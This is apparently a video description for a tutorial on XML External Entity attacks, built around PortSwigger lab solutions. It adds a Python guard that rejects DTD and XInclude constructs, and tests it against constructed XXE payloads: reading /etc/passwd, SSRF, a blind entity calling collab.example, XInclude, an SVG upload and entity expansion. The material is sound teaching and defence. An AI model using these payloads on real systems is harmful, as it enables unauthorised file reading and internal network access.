
Web App Pentesting: XML External Entities (XXE)

5.0K views
Streamed live on Apr 11, 2020
1:03:18

Explanation of XML External Entity (XXE) attacks with demos from Portswigger Web Security Academy (https://portswigger.net/web-security).

4:00 - Explanation of XML and XML Entities.
15:57 - Demonstrating entity expansion in the labs.
16:40 - Demonstrating recursive entity expansion in the labs.
19:03 - Solving the "Exploiting XXE using external entities to retrieve files" lab.
22:34 - Solving the "Exploiting XXE to perform SSRF attacks" lab.
28:04 - Solving the "Blind XXE with out-of-band interaction" lab.
32:10 - Solving the "Blind XXE with out-of-band interaction via XML parameter entities" lab.
36:35 - Solving the "Exploiting blind XXE to exfiltrate data using a malicious external DTD" lab.
43:59 - Solving the "Exploiting blind XXE to retrieve data via error messages" lab.
49:50 - Solving the "Exploiting XXE to retrieve data by repurposing a local DTD" lab.
54:17 - Solving the "Exploiting XInclude to retrieve files" lab.
58:05 - Solving the "Exploiting XXE via image file upload" lab.

Please follow me on Twitter (https://twitter.com/tibsec) and join my Discord server (https://discord.gg/4qrvKMh).
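The following is an added example, not code from the stream or from the PortSwigger labs. It shows the defensive side of the outline above: a pre-parse guard that rejects every construct the labs rely on (a DOCTYPE carrying internal, external or parameter entities, and an XInclude directive), run over constructed payloads modelled on each lab class, plus a demonstration that the Python standard-library parser still expands internal entities (the entity-expansion and recursive-expansion demos at 15:57 and 16:40), so a parser that never fetches URLs is not by itself safe. The hostnames `internal.example` and `collab.example`, the file paths, and the `stockCheck` element names are assumptions made for this example.

```python
"""Added example: reject DTD/XInclude constructs before parsing, and show that
the stdlib parser expands internal entities. All XML below is constructed."""
import codecs
import re
import xml.etree.ElementTree as ET

# Constructed inputs modelled on the lab classes in the outline above.
# Hostnames and paths are illustrative, not taken from any real target.
PAYLOADS = {
    "benign": b"<stockCheck><productId>381</productId><storeId>1</storeId></stockCheck>",
    "file_read": (b'<?xml version="1.0"?>'
                  b'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
                  b"<stockCheck><productId>&xxe;</productId></stockCheck>"),
    "ssrf": (b'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://internal.example/admin">]>'
             b"<stockCheck><productId>&xxe;</productId></stockCheck>"),
    "blind_param": (b'<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://collab.example/">%xxe;]>'
                    b"<stockCheck><productId>381</productId></stockCheck>"),
    "xinclude": (b"<stockCheck><productId>"
                 b'<xi:include xmlns:xi="http://www.w3.org/2001/XInclude" '
                 b'parse="text" href="file:///etc/passwd"/>'
                 b"</productId></stockCheck>"),
    "svg_upload": (b'<?xml version="1.0"?>'
                   b'<!DOCTYPE svg [<!ENTITY xxe SYSTEM "file:///etc/hostname">]>'
                   b'<svg xmlns="http://www.w3.org/2000/svg" width="128" height="128">'
                   b'<text font-size="16" x="0" y="16">&xxe;</text></svg>'),
}

# Markers checked on the raw bytes before any XML parser sees them.
_MARKERS = {
    "doctype": re.compile(rb"<!DOCTYPE\b", re.I),
    "entity": re.compile(rb"<!ENTITY\b", re.I),
    "parameter_entity": re.compile(rb"<!ENTITY\s+%", re.I),
    "external_id": re.compile(rb"<!ENTITY[^>]*\b(?:SYSTEM|PUBLIC)\b", re.I),
    "xinclude": re.compile(rb"http://www\.w3\.org/2001/XInclude", re.I),
}


def _to_utf8(data: bytes) -> bytes:
    """Byte-pattern checks miss UTF-16 input, so normalise BOM-prefixed UTF-16 first."""
    if data.startswith((codecs.BOM_UTF16_LE, codecs.BOM_UTF16_BE)):
        return data.decode("utf-16").encode("utf-8")
    return data


def dangerous_markers(data: bytes) -> list:
    """Sorted names of the DTD/XInclude constructs present in the document."""
    text = _to_utf8(data)
    return sorted(name for name, rx in _MARKERS.items() if rx.search(text))


def safe_parse(data: bytes) -> ET.Element:
    """Reject any document carrying a DTD or XInclude, then parse with the stdlib."""
    found = dangerous_markers(data)
    if found:
        raise ValueError("rejected XML containing: " + ", ".join(found))
    return ET.fromstring(_to_utf8(data))


# Recursive ("billion laughs") expansion, kept to 10^3 so it runs instantly.
RECURSIVE = (
    b'<?xml version="1.0"?><!DOCTYPE lolz [<!ENTITY lol "lol">'
    + b'<!ENTITY lol1 "' + b"&lol;" * 10 + b'">'
    + b'<!ENTITY lol2 "' + b"&lol1;" * 10 + b'">'
    + b'<!ENTITY lol3 "' + b"&lol2;" * 10 + b'">'
    + b"]><lolz>&lol3;</lolz>"
)


def expand_with_stdlib(data: bytes) -> str:
    """Parse WITHOUT the guard: the stdlib (expat) parser expands internal entities."""
    return ET.fromstring(data).text or ""


if __name__ == "__main__":
    for name, doc in PAYLOADS.items():
        print(f"{name:12s} -> {dangerous_markers(doc) or 'clean'}")
    print("unguarded expansion of a ~350-byte document:",
          len(expand_with_stdlib(RECURSIVE)), "chars")
```

The byte-level guard is a pre-filter, not a substitute for configuring the real parser: in lxml that means `XMLParser(resolve_entities=False, no_network=True)` and not enabling XInclude processing, and in Python generally the `defusedxml` package. The UTF-16 normalisation is there because a scanner that only looks for ASCII `<!DOCTYPE` is trivially bypassed by re-encoding the request body, which the parser would still happily decode.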

